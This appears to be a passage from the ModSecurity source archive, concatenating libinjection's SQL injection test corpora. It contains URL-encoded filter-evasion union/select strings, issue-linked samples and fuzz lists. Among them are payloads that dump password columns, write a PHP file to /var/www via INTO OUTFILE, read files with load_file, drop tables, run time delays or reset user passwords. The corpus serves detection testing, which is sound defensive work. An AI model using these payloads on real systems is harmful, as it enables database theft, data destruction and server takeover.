-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 -1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 -1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 #-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 #-1%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 #-1%23%0D%0A%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 #-1%23%0D%0A%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 #-1%23%0D%0A%23%20union%20%20%20%0D%0Aun%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 -1%23%0D%0A%0D%0Aunion -1%23%0D%0A%0D%0Aunion%20%23 -1%23%0D%0A%0D%0Aunion%20%23%0D%0A%23 -1%23%0D%0Aunion%20%23%0D%0A%23 -1%23union%20%23%0D%0Aunion -1%23union%20%23%23%0D%0Aunion -1%23union%20%23%23%0D%0A--%0D%0Aunion #-1%23union%20%23%23%0D%0A---%0D%0Aunion -1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion -1%23unn%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion -1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion -1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23 -1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23 -1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union -1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union -1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23%0D%0A%23rfae%0D%0A%23%23union -1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union -1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union -1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union -1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0A/%2A%2A/union%23--%0D%0A%23rfae%0D%0A%23%23union -1%23union%20%23%23%0D%0A%23/%0D%0A/%2A%2A/union%23-- -1%23union%20%23%23%0D%0A/1/%2A%2A/union%23-- -11/1/%2A%2A/union%23-- -1%0D%0A/1/%2A%2A/union%23-- -1/1/%2A%2A/union%23-- 1/1/%2A%2A/union%23-- -11/1/%2A%2A/union%23-- -1%0D%0A/1/%2A%2A/union -1%0D%0A/1/%2A%2A/union -1%0D%0A/1/%2A%2A/union%23 -1%0D%0A/1/%2A%2A/union%23-- -1%0D%0A/1/%2A%2A/union 1/1/%2A%2A/union %0D%0A1/1/%2A%2A/union 0-%0D%0A1/1/%2A%2A/union 0x1-%0D%0A1/1/%2A%2A/union 0x1%20-%0D%0A1/1/%2A%2A/union test%27-%0D%0A1/1/%2A%2A/union%20select test%27-%0D%0A1/1/%2A%2A/union%28select test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29 test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29 test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 test%27-1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 test%27-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 1-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/ 0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/ 0-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B %27select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B %27-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B -1.select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B 0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/ select%20load_file%28%27/asd/asd%27%29 select%20load_file%28%27/asd/asd%27%29 select%20load_file%28%27/asd/asd%27%29 %27%20into%20outfile%20%27/var/www/aa.php %27%20into%20outfile%20%27/var/www/aa.php %27%20into%20outfile%20%27/var/www/aa.php%27-- %27%20into%20outfile%20%27/var/www/aa.php%27--a- %27%20into%20outfile%20%27/var/www/aa.php%27--a- %27%20into%20outfile%20%27/var/www/aa.php%27%23 %27%20into%20outfile%20%0D%0A%27/var/www/aa.php%27 select%20load_file%28%27/asd/asd%27%29 1%20into%20outfile%20%27asd%27%0D%0A 1%20into%20outfile%20%27asd%27%0D%0A %27%20into%20outfile%20%27/var/www/aa.php %27%20into%20outfile%20%27/var/www/aa.php%27--a- 1%20into%20outfile%20%27asd%27%0D%0A %40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20 %27%20into%20outfile%20%27/var/www/aa.php %27%20into%20outfile%20%27/var/www/aa.php%27--a- 1%20into%20outfile%20%27asd%27%0D%0A %40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20 %27-%40%D1%841%20union%20select%20us3rs%20from%20table1 %40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20a%20from%20b 1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 union%20%28select%20id%20from%20users%20limit%201%2C1%29 1%20into%20outfile%20%27asd%27%0D%0A %27%20into%20outfile%20%27/var/www/aa.php%27--a- %27union%20select%20 %27union%20select %22union%20select 1%20union%20select %40a%20union%20select modsecurity-v3.0.4/others/libinjection/data/sqli-github-modsec-782.txt0000644000175000017500000000012213607066311026150 0ustar zimmerlezimmerle# https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/782 .1or-UTC_DATE-- modsecurity-v3.0.4/others/libinjection/data/sqli-github-125.txt0000644000175000017500000000057313607066311024701 0ustar zimmerlezimmerle# https://github.com/client9/libinjection/issues/125 HT @d0znpp "-sqlite_version() UNION SELECT password FROM users- -- 1337) INTO OUTFILE ‘xxx’-- 123);DROP TABLE users-- ) OR (SELECT password FROM users ... # the following don't fit into the libinjection model and are # best handled in another layer, at least for now. #)-sleep(9999 #*/UNION SELECT password FROM users-- modsecurity-v3.0.4/others/libinjection/data/sqli-github-123.txt0000644000175000017500000000035513607066311024675 0ustar zimmerlezimmerlename=David' AND 2259=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(113)||CHR(122)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2259=2259) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))) AND 'XrMo' LIKE 'XrMo modsecurity-v3.0.4/others/libinjection/data/sqli-github-114.txt0000644000175000017500000000023313607066311024670 0ustar zimmerlezimmerle# https://github.com/client9/libinjection/issues/114 # ht @sshayb ; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2 modsecurity-v3.0.4/others/libinjection/data/sqli-github-110.txt0000644000175000017500000000025313607066311024666 0ustar zimmerlezimmerle# https://github.com/client9/libinjection/issues/110 # lots of great details in this ticket HT: @lifeforms id having (1 or 1) id having (1 or true) id having (true or 1) modsecurity-v3.0.4/others/libinjection/data/sqli-fuzz-ischi.txt0000644000175000017500000002501113607066311025177 0ustar zimmerlezimmerle# # # ( 'a' ) -- ' - ( (SELECT BINARY ( 'b')) ) -- ' - ( ( BINARY COS ( 'b')) ) -- ' - ( BINARY BINARY ( 'b') ) -- ( 1 OR 1 ) -- ( 1 OR @a ) -- ( ( 1 ) ) -- ( 1 * @a ) -- ( (SELECT ( 1)) ) -- ( (SELECT ( @a)) ) -- ( BINARY ( 1) ) -- ( BINARY ( @a) ) -- ( @a OR 1 ) -- ( @a OR @a ) -- ( ( @a ) ) -- ( ( 1 OR 'b') ) -- ( ( 1 * 'b') ) -- ( (SELECT ( SELECT 'b')) ) -- ( ( SELECT ( 'b')) ) -- ( (SELECT 1 OR 'b') ) -- ( (SELECT 'a' OR 'b') ) -- ( (SELECT BINARY ( 'b')) ) -- ( (SELECT BINARY COS ( 'b')) ) -- ( (SELECT @a OR 'b') ) -- ( COS ( 1 OR 'b') ) -- ( COS ( 'a' OR 'b') ) -- ( COS ( BINARY ( 'b')) ) -- ( COS ( BINARY COS ( 'b')) ) -- ( COS ( @a OR 'b') ) -- ( 'a' OR 1 ) -- ( 'a' OR 'a' ) -- ( 'a' OR @a ) -- ( 'a' ) -- ( 'a' * 1 ) -- ( 'a' * 'a' ) -- ( 'a' * @a ) -- ( BINARY ( SELECT 'b') ) -- ( ( BINARY ( 'b')) ) -- ( BINARY BINARY ( 'b') ) -- ( BINARY BINARY COS ( 'b') ) -- ( ( @a OR 'b') ) -- ( ( @a * 'b') ) -- ( 1 in ( BINARY COS ( 'b')) ) -- ( (SELECT ( 1 OR 'b')) ) -- ( (SELECT ( SELECT 1)) ) -- ( (SELECT ( SELECT @a)) ) -- ( (SELECT ( 'a' OR 'b')) ) -- ( (SELECT ( BINARY ( 'b'))) ) -- ( (SELECT ( BINARY COS ( 'b'))) ) -- ( (SELECT ( @a OR 'b')) ) -- ( (SELECT 1 OR ( 'b')) ) -- ( (SELECT 1 OR 1) ) -- ( (SELECT 1 OR COS ( 'b')) ) -- ( (SELECT 1 OR @a) ) -- ( (SELECT 1 LIMIT 1) ) -- ( (SELECT COS ( 1 OR 'b')) ) -- ( (SELECT COS ( ( SELECT 'b'))) ) -- ( (SELECT COS ( 'a' OR 'b')) ) -- ( (SELECT COS ( BINARY ( 'b'))) ) -- ( (SELECT COS ( BINARY COS ( 'b'))) ) -- ( (SELECT COS ( @a OR 'b')) ) -- ( (SELECT 'a' OR ( 'b')) ) -- ( (SELECT 'a' OR 1) ) -- ( (SELECT 'a' OR COS ( 'b')) ) -- ( (SELECT 'a' OR @a) ) -- ( (SELECT 'a' LIMIT 1) ) -- ( (SELECT BINARY ( 1)) ) -- ( (SELECT BINARY ( SELECT 'b')) ) -- ( (SELECT BINARY ( COS ( 'b'))) ) -- ( (SELECT BINARY ( @a)) ) -- ( (SELECT BINARY COS ( 1)) ) -- ( (SELECT BINARY COS ( COS ( 'b'))) ) -- ( (SELECT BINARY COS ( @a)) ) -- ( (SELECT BINARY BINARY ( 'b')) ) -- ( (SELECT BINARY BINARY COS ( 'b')) ) -- ( (SELECT @a OR ( 'b')) ) -- ( (SELECT @a OR 1) ) -- ( (SELECT @a OR COS ( 'b')) ) -- ( (SELECT @a OR @a) ) -- ( (SELECT @a LIMIT 1) ) -- ( COS ( 1 OR ( 'b')) ) -- ( COS ( 1 OR 1) ) -- ( COS ( 1 OR COS ( 'b')) ) -- ( COS ( 1 OR @a) ) -- ( COS ( COS ( ( SELECT 'b'))) ) -- ( COS ( COS ( BINARY ( 'b'))) ) -- ( COS ( 'a' OR ( 'b')) ) -- ( COS ( 'a' OR 1) ) -- ( COS ( 'a' OR COS ( 'b')) ) -- ( COS ( 'a' OR @a) ) -- ( COS ( BINARY ( 1)) ) -- ( COS ( BINARY ( SELECT 'b')) ) -- ( COS ( BINARY ( COS ( 'b'))) ) -- ( COS ( BINARY ( @a)) ) -- ( COS ( BINARY BINARY ( 'b')) ) -- ( COS ( BINARY BINARY COS ( 'b')) ) -- ( COS ( @a OR ( 'b')) ) -- ( COS ( @a OR 1) ) -- ( COS ( @a OR COS ( 'b')) ) -- ( COS ( @a OR @a) ) -- ( BINARY ( 1 OR 'b') ) -- ( BINARY ( SELECT ( 'b')) ) -- ( BINARY ( SELECT 1) ) -- ( BINARY ( SELECT COS ( 'b')) ) -- ( BINARY ( SELECT @a) ) -- ( BINARY ( 'a' OR 'b') ) -- ( BINARY ( BINARY COS ( 'b')) ) -- ( BINARY ( @a OR 'b') ) -- ( BINARY COS ( 1 OR 'b') ) -- ( BINARY COS ( ( SELECT 'b')) ) -- ( BINARY COS ( 'a' OR 'b') ) -- ( BINARY COS ( BINARY ( 'b')) ) -- ( BINARY COS ( BINARY COS ( 'b')) ) -- ( BINARY COS ( @a OR 'b') ) -- ( BINARY BINARY ( 1) ) -- ( BINARY BINARY ( SELECT 'b') ) -- ( BINARY BINARY ( COS ( 'b')) ) -- ( BINARY BINARY ( @a) ) -- ( BINARY BINARY COS ( 1) ) -- ( BINARY BINARY COS ( COS ( 'b')) ) -- ( BINARY BINARY COS ( @a) ) -- ( BINARY BINARY BINARY ( 'b') ) -- ( BINARY BINARY BINARY COS ( 'b') ) -- ( @a in ( BINARY COS ( 'b')) ) -- ( 1 OR ( BINARY ( 'b')) ) -- ( 1 OR ( BINARY COS ( 'b')) ) -- ( 1 OR COS ( BINARY ( 'b')) ) -- ( 1 ) in ( BINARY ( 'b') ) -- ( 1 in ( BINARY BINARY ( 'b')) ) -- ( 1 * COS ( BINARY ( 'b')) ) -- ( (SELECT ( 1 OR ( 'b'))) ) -- ( (SELECT ( 1 OR 1)) ) -- ( (SELECT ( 1 OR COS ( 'b'))) ) -- ( (SELECT ( 1 OR @a)) ) -- ( (SELECT ( SELECT 1 OR 'b')) ) -- ( (SELECT ( SELECT 'a' OR 'b')) ) -- ( (SELECT ( SELECT BINARY ( 'b'))) ) -- ( (SELECT ( SELECT BINARY COS ( 'b'))) ) -- ( (SELECT ( SELECT @a OR 'b')) ) -- ( (SELECT ( COS ( ( SELECT 'b')))) ) -- ( (SELECT ( COS ( BINARY ( 'b')))) ) -- ( (SELECT ( 'a' OR ( 'b'))) ) -- ( (SELECT ( 'a' OR 1)) ) -- ( (SELECT ( 'a' OR COS ( 'b'))) ) -- ( (SELECT ( 'a' OR @a)) ) -- ( (SELECT ( BINARY ( 1))) ) -- ( (SELECT ( BINARY ( SELECT 'b'))) ) -- ( (SELECT ( BINARY ( COS ( 'b')))) ) -- ( (SELECT ( BINARY ( @a))) ) -- ( (SELECT ( BINARY BINARY ( 'b'))) ) -- ( (SELECT ( BINARY BINARY COS ( 'b'))) ) -- ( (SELECT ( @a OR ( 'b'))) ) -- ( (SELECT ( @a OR 1)) ) -- ( (SELECT ( @a OR COS ( 'b'))) ) -- ( (SELECT ( @a OR @a)) ) -- ( (SELECT 1 OR ( 1)) ) -- ( (SELECT 1 OR ( COS ( 'b'))) ) -- ( (SELECT 1 OR ( @a)) ) -- ( (SELECT 1 OR 1 * 'b') ) -- ( (SELECT 1 OR 'a' * 'b') ) -- ( (SELECT 1 OR @a * 'b') ) -- ( (SELECT 1 ) OR ( 'b') ) -- ( (SELECT 1 ) OR COS ( 'b') ) -- ( ( SELECT 1 ) OR 'b' ) -- ( (SELECT 1 UNION ( SELECT 'b')) ) -- ( (SELECT 1 in ( BINARY ( 'b'))) ) -- ( (SELECT COS ( ( SELECT ( 'b')))) ) -- ( (SELECT COS ( ( SELECT 1))) ) -- ( (SELECT COS ( ( SELECT COS ( 'b')))) ) -- ( (SELECT COS ( ( SELECT @a))) ) -- ( (SELECT COS ( BINARY BINARY ( 'b'))) ) -- ( (SELECT 'a' OR ( 1)) ) -- ( (SELECT 'a' OR ( COS ( 'b'))) ) -- ( (SELECT 'a' OR ( @a)) ) -- ( (SELECT 'a' OR 1 * 'b') ) -- ( (SELECT 'a' OR 'a' * 'b') ) -- ( (SELECT 'a' OR @a * 'b') ) -- ( (SELECT 'a' ) OR ( 'b') ) -- ( (SELECT 'a' ) OR COS ( 'b') ) -- ( ( SELECT 'a' ) OR 'b' ) -- ( (SELECT 'a' UNION ( SELECT 'b')) ) -- ( (SELECT 'a' in ( BINARY ( 'b'))) ) -- ( (SELECT BINARY ( 1 OR 'b')) ) -- ( (SELECT BINARY ( 1 * 'b')) ) -- ( (SELECT BINARY ( SELECT ( 'b'))) ) -- ( (SELECT BINARY ( SELECT 1)) ) -- ( (SELECT BINARY ( SELECT COS ( 'b'))) ) -- ( (SELECT BINARY ( SELECT @a)) ) -- ( (SELECT BINARY ( 'a' OR 'b')) ) -- ( (SELECT BINARY ( 'a' * 'b')) ) -- ( (SELECT BINARY ( BINARY ( 'b'))) ) -- ( (SELECT BINARY ( BINARY COS ( 'b'))) ) -- ( (SELECT BINARY ( @a OR 'b')) ) -- ( (SELECT BINARY ( @a * 'b')) ) -- ( (SELECT BINARY COS ( ( SELECT 'b'))) ) -- ( (SELECT BINARY COS ( BINARY ( 'b'))) ) -- ( (SELECT BINARY BINARY ( 1)) ) -- ( (SELECT BINARY BINARY ( SELECT 'b')) ) -- ( (SELECT BINARY BINARY ( COS ( 'b'))) ) -- ( (SELECT BINARY BINARY ( @a)) ) -- ( (SELECT BINARY BINARY BINARY ( 'b')) ) -- ( (SELECT BINARY BINARY BINARY COS ( 'b')) ) -- ( (SELECT @a OR ( 1)) ) -- ( (SELECT @a OR ( COS ( 'b'))) ) -- ( (SELECT @a OR ( @a)) ) -- ( (SELECT @a OR 1 * 'b') ) -- ( (SELECT @a OR 'a' * 'b') ) -- ( (SELECT @a OR @a * 'b') ) -- ( (SELECT @a ) OR ( 'b') ) -- ( (SELECT @a ) OR COS ( 'b') ) -- ( ( SELECT @a ) OR 'b' ) -- ( (SELECT @a UNION ( SELECT 'b')) ) -- ( (SELECT @a in ( BINARY ( 'b'))) ) -- ( COS ( ( SELECT ( SELECT 'b'))) ) -- ( COS ( ( SELECT 1 OR 'b')) ) -- ( COS ( ( SELECT 'a' OR 'b')) ) -- ( COS ( ( SELECT BINARY ( 'b'))) ) -- ( COS ( ( SELECT BINARY COS ( 'b'))) ) -- ( COS ( ( SELECT @a OR 'b')) ) -- ( COS ( BINARY ( BINARY ( 'b'))) ) -- ( COS ( BINARY BINARY BINARY ( 'b')) ) -- ( 'a' OR ( BINARY ( 'b')) ) -- ( 'a' OR ( BINARY COS ( 'b')) ) -- ( 'a' OR COS ( BINARY ( 'b')) ) -- ( 'a' ) in ( BINARY ( 'b') ) -- ( 'a' * COS ( BINARY ( 'b')) ) -- ( BINARY ( 1 OR ( 'b')) ) -- ( BINARY ( 1 OR 1) ) -- ( BINARY ( 1 OR COS ( 'b')) ) -- ( BINARY ( 1 OR @a) ) -- ( BINARY ( 1 ) OR 'b' ) -- ( BINARY ( SELECT ( 1)) ) -- ( BINARY ( SELECT ( SELECT 'b')) ) -- ( BINARY ( SELECT ( COS ( 'b'))) ) -- ( BINARY ( SELECT ( @a)) ) -- ( BINARY ( SELECT 1 OR 'b') ) -- ( BINARY ( SELECT 1 * 'b') ) -- ( BINARY ( SELECT 'a' OR 'b') ) -- ( BINARY ( SELECT 'a' * 'b') ) -- ( BINARY ( SELECT BINARY ( 'b')) ) -- ( BINARY ( SELECT BINARY COS ( 'b')) ) -- ( BINARY ( SELECT @a OR 'b') ) -- ( BINARY ( SELECT @a * 'b') ) -- ( BINARY ( COS ( ( SELECT 'b'))) ) -- ( BINARY ( COS ( BINARY ( 'b'))) ) -- ( BINARY ( 'a' OR ( 'b')) ) -- ( BINARY ( 'a' OR 1) ) -- ( BINARY ( 'a' OR COS ( 'b')) ) -- ( BINARY ( 'a' OR @a) ) -- ( BINARY ( 'a' ) OR 'b' ) -- ( BINARY ( BINARY ( SELECT 'b')) ) -- ( BINARY ( BINARY BINARY ( 'b')) ) -- ( BINARY ( BINARY BINARY COS ( 'b')) ) -- ( BINARY ( @a OR ( 'b')) ) -- ( BINARY ( @a OR 1) ) -- ( BINARY ( @a OR COS ( 'b')) ) -- ( BINARY ( @a OR @a) ) -- ( BINARY ( @a ) OR 'b' ) -- ( BINARY COS ( ( SELECT ( 'b'))) ) -- ( BINARY COS ( ( SELECT 1)) ) -- ( BINARY COS ( ( SELECT COS ( 'b'))) ) -- ( BINARY COS ( ( SELECT @a)) ) -- ( BINARY COS ( BINARY BINARY ( 'b')) ) -- ( BINARY BINARY ( 1 OR 'b') ) -- ( BINARY BINARY ( 1 * 'b') ) -- ( BINARY BINARY ( SELECT ( 'b')) ) -- ( BINARY BINARY ( SELECT 1) ) -- ( BINARY BINARY ( SELECT COS ( 'b')) ) -- ( BINARY BINARY ( SELECT @a) ) -- ( BINARY BINARY ( 'a' OR 'b') ) -- ( BINARY BINARY ( 'a' * 'b') ) -- ( BINARY BINARY ( BINARY ( 'b')) ) -- ( BINARY BINARY ( BINARY COS ( 'b')) ) -- ( BINARY BINARY ( @a OR 'b') ) -- ( BINARY BINARY ( @a * 'b') ) -- ( BINARY BINARY COS ( ( SELECT 'b')) ) -- ( BINARY BINARY COS ( BINARY ( 'b')) ) -- ( BINARY BINARY BINARY ( 1) ) -- ( BINARY BINARY BINARY ( SELECT 'b') ) -- ( BINARY BINARY BINARY ( COS ( 'b')) ) -- ( BINARY BINARY BINARY ( @a) ) -- ( BINARY BINARY BINARY BINARY ( 'b') ) -- ( BINARY BINARY BINARY BINARY COS ( 'b') ) -- ( @a OR ( BINARY ( 'b')) ) -- ( @a OR ( BINARY COS ( 'b')) ) -- ( @a OR COS ( BINARY ( 'b')) ) -- ( @a ) in ( BINARY ( 'b') ) -- ( @a in ( BINARY BINARY ( 'b')) ) -- ( @a * COS ( BINARY ( 'b')) ) -- ( 1 - (SELECT BINARY ( 1)) ) -- ( 1 - BINARY ( SELECT 1) ) -- ( 1 - BINARY COS ( ( 1)) ) -- ( 1 - BINARY BINARY ( 1) ) -- ( 1 - BINARY BINARY COS ( 1) ) -- ( 1 - BINARY BINARY BINARY ( 'b') ) -- ( 'a' or (SELECT BINARY ( 'b')) ) -- ( 'a' or BINARY ( SELECT 'b') ) -- ( 'a' or BINARY COS ( 1) ) -- ( 'a' or BINARY BINARY ( 'b') ) -- ( 'a' or BINARY BINARY COS ( 'b') ) -- ( 1 IN (1) or (SELECT BINARY ( 'b')) ) -- ( 1 IN (1) or BINARY ( SELECT 'b') ) -- ( 1 IN (1) or BINARY COS ( 1) ) -- ( 1 IN (1) or BINARY BINARY ( 'b') ) -- ( 1 IN (1) or BINARY BINARY COS ( 'b') ) -- (select 1 from dual union select 1 limit 1) -- (select 1); (select 1); update users set password = 99 (select 1); select 1; update users set password = 99 select 1; (select 1); update users set password = 99 1; update users set password=1 ( (SELECT 'b') ) ; UPDATE user set password = 99; ( (SELECT @a) ) ; UPDATE user set password = 99; modsecurity-v3.0.4/others/libinjection/data/sqli-fullqueries.txt0000644000175000017500000001054413607066311025451 0ustar zimmerlezimmerle# # Frequently not SQLi but # select 1 from foo where select @version from foo where select 'foo' from bar where # select 1,1,1,1,1,1,1 # select @version,@version,@version # select 'foo','bar',1,2,3,4 select sin(1),2 from bar where select sin(id),2 from bar where select sin('1'),2 from bar where select sin(@version),2 from bar where select sin((1)),2 from bar where select sin((id)),2 from bar where select sin(('1')),2 from bar where select sin((@version)),2 from bar where select sin(((1)),2 from bar where select sin(((id)),2 from bar where select sin((('1')),2 from bar where select sin(((@version)),2 from bar where select -sin(1),2 from bar where select -sin(id),2 from bar where select -sin('1'),2 from bar where select -sin(@version),2 from bar where select -sin((1)),2 from bar where select -sin((id)),2 from bar where select -sin(('1')),2 from bar where select -sin((@version)),2 from bar where select -sin(((1)),2 from bar where select -sin(((id)),2 from bar where select -sin((('1')),2 from bar where select -sin(((@version)),2 from bar where select 1,sin(1),2 from bar where select 1,sin(id),2 from bar where select 1,sin('1'),2 from bar where select 1,sin(@version),2 from bar where select 1,sin((1)),2 from bar where select 1,sin((id)),2 from bar where select 1,sin(('1')),2 from bar where select 1,sin((@version)),2 from bar where select 1,sin(((1)),2 from bar where select 1,sin(((id)),2 from bar where select 1,sin((('1')),2 from bar where select 1,sin(((@version)),2 from bar where select -1,sin(1),2 from bar where select -1,sin(id),2 from bar where select -1,sin('1'),2 from bar where select -1,sin(@version),2 from bar where select -1,sin((1)),2 from bar where select -1,sin((id)),2 from bar where select -1,sin(('1')),2 from bar where select -1,sin((@version)),2 from bar where select -1,sin(((1)),2 from bar where select -1,sin(((id)),2 from bar where select -1,sin((('1')),2 from bar where select -1,sin(((@version)),2 from bar where select id,sin(1),2 from bar where select id,sin(id),2 from bar where select id,sin('1'),2 from bar where select id,sin(@version),2 from bar where select id,sin((1)),2 from bar where select id,sin((id)),2 from bar where select id,sin(('1')),2 from bar where select id,sin((@version)),2 from bar where select id,sin(((1)),2 from bar where select id,sin(((id)),2 from bar where select id,sin((('1')),2 from bar where select id,sin(((@version)),2 from bar where select @version,sin(1),2 from bar where select @version,sin(id),2 from bar where select @version,sin('1'),2 from bar where select @version,sin(@version),2 from bar where select @version,sin((1)),2 from bar where select @version,sin((id)),2 from bar where select @version,sin(('1')),2 from bar where select @version,sin((@version)),2 from bar where select @version,sin(((1)),2 from bar where select @version,sin(((id)),2 from bar where select @version,sin((('1')),2 from bar where select @version,sin(((@version)),2 from bar where select '1',sin(1),2 from bar where select '1',sin(id),2 from bar where select '1',sin('1'),2 from bar where select '1',sin(@version),2 from bar where select '1',sin((1)),2 from bar where select '1',sin((id)),2 from bar where select '1',sin(('1')),2 from bar where select '1',sin((@version)),2 from bar where select '1',sin(((1)),2 from bar where select '1',sin(((id)),2 from bar where select '1',sin((('1')),2 from bar where select '1',sin(((@version)),2 from bar where select -'1',sin(1),2 from bar where select -'1',sin(id),2 from bar where select -'1',sin('1'),2 from bar where select -'1',sin(@version),2 from bar where select -'1',sin((1)),2 from bar where select -'1',sin((id)),2 from bar where select -'1',sin(('1')),2 from bar where select -'1',sin((@version)),2 from bar where select -'1',sin(((1)),2 from bar where select -'1',sin(((id)),2 from bar where select -'1',sin((('1')),2 from bar where select -'1',sin(((@version)),2 from bar where select 1,(2),3 from bar where select (1),(2),3 from bar where select ((1)),(2),3 from bar where select (((1))),(2),3 from bar where select ('1'),(2),3 from bar where select (('1')),(2),3 from bar where select ((('1'))),(2),3 from 